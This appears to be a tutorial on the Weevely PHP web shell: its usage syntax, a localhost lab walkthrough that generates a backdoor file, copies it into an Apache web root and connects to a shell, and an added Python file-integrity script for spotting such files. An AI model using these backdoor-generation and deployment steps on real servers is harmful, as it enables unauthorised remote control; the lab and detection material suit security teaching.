Weevely is a command-line web shell for remote administration and pen testing that is dynamically extended over the network at runtime. It provides a weaponized telnet-like console through a PHP script running on the target, even in restricted environments.
The low-footprint agent and over 30 modules form an extensible framework to administer, pen-test, post-exploit, and audit remote web accesses in order to escalate privileges and pivot deeper into internal networks.
[+] Start ssh-like terminal session
    weevely <url> <password>

[+] Run command directly from command line
    weevely <url> <password> [ "<command> .." | :<module> .. ]

[+] Generate PHP backdoor
    weevely generate <password> [ <path> ] ..

[+] Show credits
    weevely credits

[+] Show available module and backdoor generators
    weevely help
cyborg@cyborg:~$ sudo weevely generate aaa123 '/home/cyborg/bdoor.php'
[generate.php] Backdoor file '/home/cyborg/bdoor.php' created with password 'aaa123'
Now start the Apache server:
cyborg@cyborg:~$ sudo service apache2 start
[sudo] password for cyborg:
 * Starting web server apache2
AH00558: apache2: Could not reliably determine the server's fully qualified domain name, using 127.0.0.1. Set the 'ServerName' directive globally to suppress this message
Check whether the file is there:
cyborg@cyborg:~$ ls
bdoor.php  Documents  examples.desktop  Pictures  Videos
Desktop    Downloads  Music             Public
Copy the file to the vulnerable server; in this case we use our own Apache server (/var/www):
cyborg@cyborg:~$ sudo cp bdoor.php /var/www/html
Now connect to the file hosted on the server, in this case our localhost:
cyborg@cyborg:~$ sudo weevely http://127.0.0.1/bdoor.php aaa123

      ________                      __
     |  |  |  |-----.----.-.--.----'  |--.--.
     |  |  |  |  -__| -__| |  | -__|  |  |  |
     |________|_____|____|___/|____|__|___  | v1.0
                                      |_____|
              Stealth tiny web shell

[+] Welcome to Weevely. Browse filesystem and execute system commands.
[+] Use ':help' to list available modules and run selected one.

root@cyborg:/var/www/html $
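Seen from the defender's side, the walkthrough above leaves one new PHP file in the web root. The following Python script is an added example, not code from the original page or from the Weevely project: it records a hash baseline of the executable scripts under a web root and reports what was added, modified or removed since. The function names, the extension list and the temporary demo directory are assumptions made for illustration.

```python
import hashlib
import tempfile
from pathlib import Path

# Extensions the PHP handler may execute; an assumption, match it to the server's config.
SCRIPT_EXTS = {".php", ".phtml", ".phar"}


def snapshot(webroot):
    """Map each script path (relative to the web root) to its SHA-256 digest."""
    root = Path(webroot)
    manifest = {}
    for path in sorted(root.rglob("*")):
        if path.is_file() and path.suffix.lower() in SCRIPT_EXTS:
            digest = hashlib.sha256(path.read_bytes()).hexdigest()
            manifest[path.relative_to(root).as_posix()] = digest
    return manifest


def diff(baseline, current):
    """Return the scripts added, modified or removed since the baseline."""
    common = set(baseline) & set(current)
    return {
        "added": sorted(set(current) - set(baseline)),
        "modified": sorted(p for p in common if baseline[p] != current[p]),
        "removed": sorted(set(baseline) - set(current)),
    }


def demo():
    """Constructed web root: take a baseline, then change it as the walkthrough does."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "index.php").write_text("<?php echo 'home'; ?>")
        (root / "logo.png").write_bytes(b"\x89PNG")  # not a script, ignored
        baseline = snapshot(root)
        # Stand-in for the copied file (placeholder content, not a real agent).
        (root / "bdoor.php").write_text("<?php /* placeholder */ ?>")
        (root / "index.php").write_text("<?php echo 'home v2'; ?>")
        return diff(baseline, snapshot(root))


if __name__ == "__main__":
    for kind, paths in demo().items():
        for p in paths:
            print(f"{kind:9} {p}")
```

On a real server the baseline would be taken from a known-good deployment and stored outside the web root, so that a process able to write to /var/www/html cannot also rewrite the manifest.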